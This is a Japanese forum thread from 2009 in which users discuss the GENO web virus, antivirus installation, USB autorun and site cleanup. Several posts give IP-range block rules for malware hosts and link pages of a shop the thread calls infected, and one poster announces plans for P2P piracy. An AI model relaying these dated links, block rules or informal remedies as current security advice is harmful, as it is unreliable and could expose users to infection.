250 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 08:07:24 ]
>>230
こういうの見てると
やっぱりネット接続は免許制度と車検制度(PC検?)みたいなの導入すべきだよなあとつくづく思う
前スレだかに5年くらいしか使ってないのに新しいの買えるかって言ってる輩がいて
そのときもやはり同じ事思った



251 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 08:07:44 ]
>>239
インターネットしたら感染する
LANケーブルで繋がったPC、プリンタ、ルータはヤバイ


252 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 08:07:56 ]
>>249
少しは自分で調べろ

253 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 08:07:58 ]
>>247
問題はサポートが続いてるOSを使う事が第一であって速度は二の次だ

254 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 08:09:08 ]
>>249
そのぐらいもわからないならメーカーに電話してこい。
ここより親切に対応してくれるぞ。

255 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 08:09:13 ]
PC買い換えるなら要らなくなったPCくれよ

256 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 08:09:15 ]
>>253
8千円でサポート続いているOSの入った中古PC買えるのか?

257 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 08:09:18 ]
>>249
ググレ

258 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 08:09:36 ]
>>240
ネットに繋ぐ「だけ」で感染するブラスターとかあったなあ…

259 名前:名無しさん@お腹いっぱい。 [2009/05/16(土) 08:09:45 ]
>>239
読んでないだろ
100回読んでもどうしてもわからないなら同人板の方のwiki行け
同人の方の場所がわからないとか言うなよ、抽出しろ

260 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 08:09:46 ]
いい加減スレチ



261 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 08:09:50 ]
>>243
レスありがとうございます
カスペはインストールしたんですがkis8ってフォルダの中にあるsetupを開こうとすると
「インストールのログファイルを開くときにエラーが発生しました。指定されたログファイルの場所が存在し、
書き込み可能であることを確認してください。」と出てスキャンできないんですが
何がいけないんでしょうか。

262 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 08:10:50 ]
>>256
XPの初期のがごろごろ出てる
なんだかんだいっても出てから8年だからなXPは

263 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 08:10:59 ]
>>255
要らなくなったPCは、P2P用にするつもり
一度、WinnyとかShareってやってみたかったんだ
でも、個人情報流出とか怖いんで、専用PC持ってない状態じゃすべきじゃないと思っててね
もし、新しいPC買ったら、古いMeの入ったPCはP2P専用マシンになる予定

264 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 08:11:47 ]
>>256
XP PRO PEN4 搭載がごろごろあるっつーの。

265 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 08:12:02 ]
>>256
2kのなら買えるかもな

266 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 08:12:08 ]
>>263
延々とウイルスにかかるわけですね

267 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 08:12:27 ]
>>263
ダウンロードも違法扱いになったの知ってるか?

268 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 08:12:36 ]
>>264
本体だけ?ノート?
本当に8000円でXPインストール済み?

269 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 08:14:25 ]
>>263
セキュ板で割れ宣言するヤツがいるなんて・・・

270 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 08:14:51 ]
>>268
この店安いから探してみ

www.geno-web.jp/



271 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 08:14:53 ]
>>268
スリムタワーが多いかな5000円ぐらいからが多い
ノートだと10000円からかな

272 名前:94 101 154 mailto:sage [2009/05/16(土) 08:15:01 ]
>>250
じつは同じヤツだと思うよ。
そのPCでクレジットカード使ってみろって話。
それが嫌で、危険だと分かるなら、ネットにつなぐなって、そう思うよな。

>>261
多分、ディレクトリに日本語が混ざっている。
ドライブのルートでやってみれ。

>>228
そのサイトの人は、そう書いているね。
IE7以前だと、そう(ヤバイ)みたいだね。
IE8では対策されているみたい。

いずれにしても、これまでにあがったような対策をしなきゃならん。

273 名前:214 mailto:sage [2009/05/16(土) 08:15:01 ]
>>261
最初インストールする時にセットアップするファイルを解凍してできるのがkis8フォルダで
インストール先は変えてなければC:\Program Files\Kaspersky Labです

インストールができたらkis8フォルダはもう要らないので捨てていいよ

274 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 08:15:18 ]
>>263は釣りだろ
こやつめははは

275 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 08:15:34 ]
>>270
らめぇえぇぇっぇぇえ

276 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 08:16:15 ]
>>270
>>268じゃないけどありがとうw

277 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 08:16:43 ]
>>270
www.geno-web.jp/

本当に、安いね


278 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 08:16:44 ]
>>263
残念 (^^;

279 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 08:18:27 ]
GenoウイルスのスレでGenoのサイト勧めるとかww

280 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 08:18:34 ]
>>268
デスクトップは本体だけで8000円
15モニタ付きなら12000円
ノートなら2万
どれも4年から5年落ち
初心者はリカバリCD付き買いなよ。



281 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 08:19:17 ]
★3まで超マッタリだったのに一昨日からのこの加速ぶりはなんなんだ・・・

282 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 08:19:19 ]
ウイルス入りだから安いんだろ

283 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 08:20:25 ]
何このGENOマッチポンプ商法

284 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 08:20:46 ]
www.geno-web.jp/Goods/GB09002150.html
【良品中古】 DELL OPTIPLEX GX60 [OPTIPLEX GX60]
(Cel 2.40GHz/ 512MB/ 40GB/ DVD-ROM/ WinXP ProリカバリCD付き)

[販売価格] 7,999 円
これで良いじゃん

285 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 08:20:55 ]
>>281
同人板の腐女子連中が流入してきた

286 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 08:20:57 ]
安物買いの銭失いになりかねんわ

287 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 08:21:20 ]
>>281
同人スレから流れてきてるんじゃね

288 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 08:21:43 ]
>>284
ウイルスもプリインストールされてるんだろ?

289 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 08:22:30 ]
>>268
使い捨てPCっていいぞ。

290 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 08:22:56 ]
そういやアンチウィルスソフトも安売りしてたよね



291 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 08:24:36 ]
>>284
企業の払い下げとはいえ、十分使えるスペックのマシンがゴミのような値段とは、恐ろしい世の中だ

292 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 08:25:48 ]
次スレいらないね

293 名前:94 101 154 mailto:sage [2009/05/16(土) 08:26:10 ]
www.itmedia.co.jp/enterprise/articles/0905/14/news020.html
偽フラッシュのインストールを促すらしいぞ。
みんな気をつけろよ。

294 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 08:26:23 ]
>>284
このPCショップは信用できるのか?
HPにウイルス仕込まれているようなところだろ?

やっぱ、買うならソフマップとかで買いたいわ
アフターケアも何も無いような弱小の中古PC屋だと
使い捨てのサブPCなら良いけど、メインとして使うには怖い

295 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 08:26:56 ]
>>272
すみませんドライブからルート検索するってどうやるんですか。

>>273
ファイル名を指定して実行したらたくさんファイルが出てきたんですが、
カスペらしき名前のファイルが見当たりませんでした。
どんな名前かとかわからないでしょうか。

296 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 08:27:01 ]
見積りとかはVIPでやれよ
ここはセキュリティ板

297 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 08:27:02 ]
GENOのURL貼るなw
心臓がどっきんこ言っただろw

298 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 08:28:11 ]
やっぱ、「GENOウイルス」って名称は
中古PCショップの「GENO」が発祥だから?

299 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 08:28:25 ]
>>294
ソフマップはまともな買取してないからハズレ率が高いよ

300 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 08:29:32 ]
>>298
YES



301 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 08:30:01 ]
>>299
でも、すぐに潰れるってことは無さそうだし、一応、アフターケアもしているじゃん
困った時に、電話で質問できるってのは大きいよ

ソフマップ以上に信用できる大手の中古PCショップってあるか?

302 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 08:30:03 ]
>>295
画面の右下のカスペアイコン右クリックでスキャンとか設定とか

カスペアイコンある? ちゃんとインストール出来てるのかな?

303 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 08:30:17 ]
>>293
これ見て、逆にAdobeのアップデータも入れていいのか混乱する人出そうだなw

304 名前:名無しさん@お腹いっぱい。 [2009/05/16(土) 08:30:38 ]
>>94
勉強になるなぁ

305 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 08:31:02 ]
>>298
GENOの対応があまりにもすばらしかったから、それに敬意を表して
GENOウイルスと呼ぶようになった

306 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 08:31:55 ]
>>295
あとエクスプローラでファイルやフォルダやドライブを右クリで
カスペマークのスキャン

307 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 08:32:02 ]
>>94
>本当に必要なファイルはVirusTotalにかけて、
>それ以外の99パーセントのファイルは、一応スキャンした後で、外付けHDDとかに退避がおすすめ。
>そしてしばらく凍結。
>今は完全に 悪意の攻撃者 >>>>>>>>>>>>>>>>>>>>>>>セキュリティーベンダー
>だから、1ヶ月(いや、最悪半年か?)くらい、不要ファイルは寝かせて、
>セキュリティーベンダーのウィルス特定精度があがってきた頃に、外付けHDDの中を再スキャン。
>その時は、マカフィー、ノートン、G-Data Kaspersky など複数ソフトで検索した方がいいよ。



勉強になるなぁ

308 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 08:33:40 ]
>>298
実際、どっかのセキュリティベンダーが、
その初代ウィルスをGENOなんとかって命名してる

309 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 08:33:54 ]
ところで、外付けHDDに全ファイルを対比させたとして、
後でUSBでクリーンインストール後のPCに接続した時に、
外付けHDDに潜んでいるウイルスがクリーンなPC本体に入り込む危険は無いの?

310 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 08:35:06 ]
>>309
危険は有る



311 名前:272 mailto:sage [2009/05/16(土) 08:35:20 ]
>>295
ごめん。
そういう意味じゃなくって、
setup.exeの親フォルダはkis8なんでしょ?
そのまた親フォルダか爺さんフォルダか、ひい爺さんフォルダに日本語を含んでない?
例えば、Dドライブ直下に半角英数でKIS8ってフォルダを作って、そこにKIS8の全ファイルを移動してWクリックで
セットアップが起動しないか試してみて。

312 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 08:35:30 ]
現状は知らないけど同人板はウイルスが原因で爆撃されて被害に遭ってたよな。
P2Pは関係なくてロダに上がってるファイルから感染してる場合が多いのも特徴だった。

313 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 08:35:34 ]
629 :GENO:2009/05/16(土) 07:04:38 ID:SvPTTP+Z0
GENO(ジェノ)ウイルス。
まさにGENOCIDE(集団虐殺)

誰がうまいこと言えと。まぁ俺なんですけどね。

314 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 08:35:35 ]
Virtual BoxにUbuntu入れて
それでネットやるか

315 名前:名無しさん@お腹いっぱい。 [2009/05/16(土) 08:36:22 ]
google charmは今のところ閲覧問題なし?

316 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 08:37:12 ]
>>284
開いちゃったんだが大丈夫だよな…?

317 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 08:37:22 ]
GENOのおかげで日本中に広まったんだから
敬意を表してGENOウイルスと呼んでやろうぜ

318 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 08:37:45 ]
ああカスペをインストールできてないみたいなのか

319 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 08:37:46 ]
同人板の連中なんてhtmlも使えない奴ばっかだろ
何言っても無駄

320 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 08:37:53 ]
>>302
デスクトップにはkis8って名前のフォルダとkis8.0.0.454.jptaって名前のアイコンがあります。
kis8.0.0.454.jptaのアイコンを右クリックすると開くは出るんですがスキャンは透明でクリックできません。
開いて実行を選択するとC:\Documents and Settings\as\デスクトップ\と出ます、
解凍をクリックすると既に同名のファイルが存在しますと出ます。

>>273さんが教えてくれたC:\Program Files\Kaspersky Labを入力して実行してみたら
インストールの画面が出たんですが、この画面は何度もでてインストールはしたはずなんですが、
やってみたほうがいいでしょうか。



321 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 08:38:16 ]
>>316
あなたの危機感がアウトー

322 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 08:38:18 ]
>>316
大丈夫ですよ^^

って言ってもらえば満足か?

323 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 08:38:27 ]
>>312
それもあるだろうけど
個人でサイト持ってる率が他より多いからじゃね?
FTPでうpする際に撒くと

324 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 08:38:58 ]
>>316
感染した可能性はありますん

325 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 08:41:53 ]
>>310
じゃあ、一旦、外付けHDDに内容を退避して
OS再インストール後のクリーンPCに戻すことは出来ないの?

USBで接続した瞬間にウイルスが入り込んでくる?

326 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 08:42:02 ]
>>320
>>272じゃないけど、フォルダのパスに「デスクトップ」っていう日本語が入ってるからアウトなんじゃない
つまりは、ドライブルートに入れて(つまりマイコンピュータ開いてCドライブ直下にフォルダを移動して)実行すればいけると思う

327 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 08:42:27 ]
>>320
同名のファイルが存在しますと出るのはもうすでにkis8フォルダがあるから
一度kis8フォルダを削除してkis8.0.0.454.jptaを>>311さんの言うとおり
D:\とかC:\に移動してからダブルクリックでインストールして

328 名前:94 101 154 mailto:sage [2009/05/16(土) 08:44:17 ]
>>313
ひそかにうまいと思っていた。

>>295
はカスペインストールできてないと思うんだよ。 
解凍しただけだから、setup.exeを起動してインストールさせようとしているんじゃないの?

そう思って>>311 を書いた。
>>320
インストールできていない。
プログラムの追加と削除で確認してみな。
インストールできていたら、セットアップ画面でポリシーと尋ねられるから、そこで迷うはず。
すでに通過したとは思えない。

>>316
トップしかみてないけど、トップは大丈夫くさい。
スクリプトはGeno関連のgoogleだけで、いつもと同じ。

329 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 08:45:41 ]
インストール終わったらkis8フォルダ入れないので削除ね

330 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 08:46:28 ]
訂正
インストール終わったらkis8フォルダ要らないので削除ね



331 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 08:46:42 ]
>>325
とりあえずなんのために時間を置くのか解っているのか

332 名前:名無しさん@お腹いっぱい。 [2009/05/16(土) 08:48:32 ]
>>284のサイトを開いたがVistaだから問題ないな

333 名前:名無しさん@お腹いっぱい。 [2009/05/16(土) 08:49:16 ]
Skypeとかメッセンジャーは感染元になったりすることはあるんでしょうか

334 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 08:50:21 ]
>>333
他のウイルスならある

335 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 08:52:30 ]
仕方ないから貯めた画像だけでチンコしごくか
ひさじぶりに見た画像が妙にエロくて右手が止まらないwwwwwwwwwwwwwwwwwwwwwwwwww

336 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 08:53:10 ]
>>334
回答有難うございます


337 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 08:53:14 ]
>>335
楽しそうだなwwwwwwww

338 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 08:53:34 ]
>>333
ttp://www.yomiuri.co.jp/net/security/goshinjyutsu/20071128nt0d.htm

339 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 08:53:45 ]
同人板へお帰りください><;

340 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 08:56:15 ]
同人板でデフォルト名無しで書いてるのはこっちから流れてった人か?
デフォ名無しは各自あぼーん対象だぞあそこは



341 名前:94 101 154 mailto:sage [2009/05/16(土) 08:56:21 ]
>>325
時間おけば、セキュリティーソフトが対応してくるだろうけど、
USBの自動再生はきっておいた方がいい。

support.microsoft.com/kb/967715/ja
www.atmarkit.co.jp/fwin2k/win2ktips/1139autrun/autrun.html
blogs.technet.com/jpsecurity/archive/2009/02/25/3206334.aspx
MSがヘマやらかしてるから、情報が交錯していて結構面倒。

うるおぼえだけど、マイクロソフトがXPにおけるUSBの自動再生は無効にする予定だった気がする。

342 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 08:57:38 ]
>>335
うおい!なんかイカくせーぞw

343 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 08:58:45 ]
USBの自動再生なんぞ
Shell Hardware Detection
っていうサービスとめればすぐとまるだろ

344 名前:名無しさん@お腹いっぱい。 [2009/05/16(土) 08:59:52 ]
Vistaでも感染するんじゃない?

ieがアドビの更新頻繁に求めて来たぞ


345 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 09:00:09 ]
 他人の不幸で今日も飯がうまい!!
    +        ____    +
      +   /⌒  ⌒\ +
   キタ━━━//・\ ./・\\━━━━!!!!
    +   /::::::⌒(__人__)⌒:::::\  +
        |  ┬   トェェェイ     |
     +  \│   `ー'´     /    +
     _|\∧∧∧MMMM∧∧∧/|_
     >                  <
   /  ─ /  /_ ──┐ヽ|  |ヽ  ム ヒ | |
 \/  ─ / / ̄ /   /  | ̄| ̄ 月 ヒ | |
  ノ\ __ノ   _ノ   \   / | ノ \ ノ L_い o o

346 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 09:00:21 ]
>>344
感染する

347 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 09:01:07 ]
>>345
そう言いながら実はウイルス飼ってるんですよねw

348 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 09:03:22 ]
>>306
>>320
>>326
>>327
>>311
レス遅くてすみません。
Cドライブに移して実行したらインストール画面が出てきました。
インストールをクリックすると既に同じバージョンの製品がインストールされてます。上書きインストールを始めますかとでます。
続けても平気でしょうか?

349 名前:名無しさん@お腹いっぱい。 [2009/05/16(土) 09:05:09 ]
いまさらな質問で悪いんだが、同人サイトが感染ってことはその各管理人がロガーでパス抜かれてサイト編集されたってこと?
だとしたらキーロガーとしてもそうとう恐いウイルスって認識していいの?
流れに乗り遅れていまひとつよくわからん

350 名前:344 [2009/05/16(土) 09:06:16 ]
〉〉346

把握



351 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 09:06:48 ]
そういえばこの間、Adobe Readerのアップデートしやがれって連絡が何度もきてたっけ
これが原因か

352 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 09:07:35 ]
>>349
うpする時にファイルにコード書き込むんじゃないっけ?

353 名前:332 [2009/05/16(土) 09:07:43 ]
>>344
えっ!?

354 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 09:09:01 ]
何なのこの勢いw

355 名前:名無しさん@お腹いっぱい。 [2009/05/16(土) 09:09:14 ]
今ルーターの設定をやっているのだが、拒否するIPアドレスは94.247.0.0/16でOKですか?

356 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 09:09:28 ]
>>348
わけわからなくなってるようなのでプログラムの追加と削除で一度アンインストールして
初めからやり直すのがいいんじゃないかな

357 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 09:09:56 ]
>>349,352
両方だな感染したままだとうp時にうp先にも繁殖
PC側をクリーンにしてもPWがキーローガーで流れててれば改竄さえる危険が有る

358 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 09:10:00 ]
語尾にwを付けたがる奴は同一人物か?
同人板に帰れよ

359 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 09:10:39 ]
うほっ、今更ながらcmdとregedit立ち上げを試してみたがどっちも立ち上がった
MD5改変もない、Adobeのリーダーは削除したがフラッシュプレイヤーは10.22.87(?)と確か最新
感染したかもと恐怖したがどうやら大丈夫そうだな・・・
ただ同人サイトの巡回は当分無理だな、しょうがないとはいえ

360 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 09:11:03 ]
kis8フォルダも削除ね



361 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 09:16:37 ]
まあちゃん♪

362 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 09:17:35 ]
>>356
試しにインストールクリックしたら
「インストールのログファイルを開くときにエラーが発生しました。
指定されたログ、ファイルが存在し書き込み可能であるか確認してください」とでてしまいました。

アンインストールしてみます。

363 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 09:17:50 ]
そんなあなたにLinux
USBメモリからも起動できて同人サイトの巡回もウマウマ

364 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 09:18:28 ]
>>355
他にもあるみたい

365 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 09:19:09 ]
>>349
キーロガーじゃ無い事に注意

366 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 09:21:47 ]
>>355
厳密に94.247.[2-3].[0-255]だけを弾きたいなら、94.247.2.0/23でもいいんじゃない
俺はFWには94.247.0.0/16で登録してるけど

367 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 09:22:13 ]
>>341
USBで接続された外付けHDDの自動再生、つまり「プラグ・アンド・プレイ」のこと?

自動で中身を読み込まなければ、USB接続して外付けHDDの中身をavastとかでチェックかけて
何も出てこなければPC内部のHDDにコピーしてもOK?

368 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 09:23:29 ]
>>355
それはちょっと前のZlkonだね。
今は、94.229.65.160/27が必要。

369 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 09:25:04 ]
MS、Autorunを正しく無効化するための更新プログラムを公開

370 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 09:25:08 ]
>>1に載っているサイトさん(atword.jp/gnome)の最新記事、
矛盾しているように見えるのですが、もし感染していた場合、
サイトのクリーンアップとローカルのクリーンアップどちらを優先するべきですか?



以下のふたつの文章です
--------------------------------------------------------------
>附記的な注意になりますが、すべてのイメージファイルをバックアップから再アップロードしてください。
>※注意:先に全サイト内の全部のディレクトリからすべてのファイルを消す必要があります。

--------------------------------------------------------------
>絶対に感染したPCで感染したサイトのクリーンアップを行わないでください。
>貴方はまず先に、感染しているかもしれないローカルなPCのクリーンアップから開始しなければなりません。



371 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 09:26:32 ]
www29.atwiki.jp/geno/pages/14.html
94.247.2.195(94.247.[2-3].[0-255])への接続を遮断


この情報は古い

372 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 09:26:57 ]
>>370
まずは自分のPCをきれいにしてください。

373 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 09:27:43 ]
クリーンアップ (Clean up) とは野球に於いて、塁の上にいる走者を生還させることが期待される打順のことである。

374 名前:名無しさん@お腹いっぱい。 [2009/05/16(土) 09:29:28 ]
ここの>>2見てAdobe Readerってダメなのかと思ってAdobe Acrobat Readerググったら有料かよ
大人しくAdobe Readerでチェックボックス外すか
それにしても、カズペが落ち目だからノートン乗り換えようと思ったら、そのノートンがGENOには残念対応とか・・


375 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 09:30:47 ]
>>368
もう94.0.0.0/8とかでいいよww

376 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 09:32:25 ]
テンプレにこれ入ってないな

PeerGuardian 33
hideyoshi.2ch.net/test/read.cgi/download/1237676474/

377 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 09:33:21 ]
>>371
いまはどうなってんの?

378 名前:名無しさん@お腹いっぱい。 [2009/05/16(土) 09:33:55 ]
>>373
なるほど、だから「走者一掃の満塁ホームラン」などと言われるのか。

379 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 09:34:00 ]
もしサイトがもう感染してたらファイル消した方がいいんだよな?

380 名前:名無しさん@お腹いっぱい。 [2009/05/16(土) 09:34:04 ]
>>355
ttp://www.rupan.net/uploader/download/1242369471.txt
ttp://www1.axfc.net/uploader/File/so/23641.txt

サイダーなら下の方がいいね



381 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 09:35:52 ]
ん?
Acrobat Readerの改名がAdobe Readerだよね?

382 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 09:36:50 ]
戒名な

383 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 09:38:19 ]
不安なやつは、再インストール。

これが鉄板。

384 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 09:38:24 ]
>>379
自分のPCを綺麗にする→サイトを綺麗にする の順。
出来れば自分のPCをきれいにした後FTP Password変更

汚染されたPCからサイトのファイルを操作してもいたちごっこ。

385 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 09:38:44 ]
>>284
吹いたwwwおっめーふざけんなお

noscriptさんとavastくんに警護されてるから屁でもないぜ

386 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 09:42:01 ]
>384
汚染されたPCからでも既にファイル改竄されてしまってるなら
全部消した方がいいんじゃないの?見た人感染するから
ファイル改竄がまだならアクセスしたらまずいんだろうけど

387 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 09:44:33 ]
まとめサイトがおかしいという話をきいたが

388 名前:名無しさん@お腹いっぱい。 [2009/05/16(土) 09:44:50 ]
>>380
40箇所以上もあるのか。
うちのルーターは最大で32箇所なのだがorz

389 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 09:46:04 ]
え、3時間前と変わってない気がする>まとめサイト

どこがおかしいのか指摘plz

390 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 09:47:25 ]
>>386

>>379は既にサイトが感染した場合を想定している。
早急に汚染を拡大させない*だけ*の目的なら、自身のWeb用htmlファイル全削除後に
サイトのファイル全消去。
だろうけれど、復旧にどれくらい時間がかかるかな。




391 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 09:48:16 ]
おとといまで保守気味に書き込んでたのに
ここ2日で一気に進行加速しててワロタ

やっと認知されてきたのに、対応法は進化してないのがガクガク(((( ;゚Д゚))))ブルブル

392 名前:名無しさん@お腹いっぱい。 [2009/05/16(土) 09:48:35 ]
>>387
同人サイト向けWiki


393 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 09:48:37 ]
>>388
そんなに無理ww

394 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 09:48:48 ]
カスペインストール失敗した者なんですけど、一度アンインストールしました。
もう一回インストールするときに気をつけたほうが良いこととかあったら助言お願いします。

395 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 09:49:01 ]
693 geno New! 2009/05/16(土) 09:34:37 ID:lv1QsSrS0
今急いでチェックしてきた。これは怖い
サイトの日記でも注意喚起して来た方がいいね

あと同人向けまとめWikiのGENOウィルスまとめへのリンクが
違うサイトになっててビビったから報告


694 GENO sage New! 2009/05/16(土) 09:37:15 ID:oOSNfhyI0
>>255の、まとめサイトへのリンクが変なんだが…
関係ないページに飛ばされる。ちなみに飛んだ先でnoscriptがjs4個ブロックした

396 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 09:50:29 ]
誰かに弄られたんだな

397 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 09:50:51 ]
Avira、対応したな
過信は禁物だが

Engine Update AV8/9 8.02.00.168 / AV7 7.09.00.168 (2009-05-15)
- Updated: PDF exploit detection
HTML/Shellcode.Gen

398 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 09:52:07 ]
>>397
有志が毎日報告してくれてるけど、その時点ではスルーも多いから
本当に油断禁物

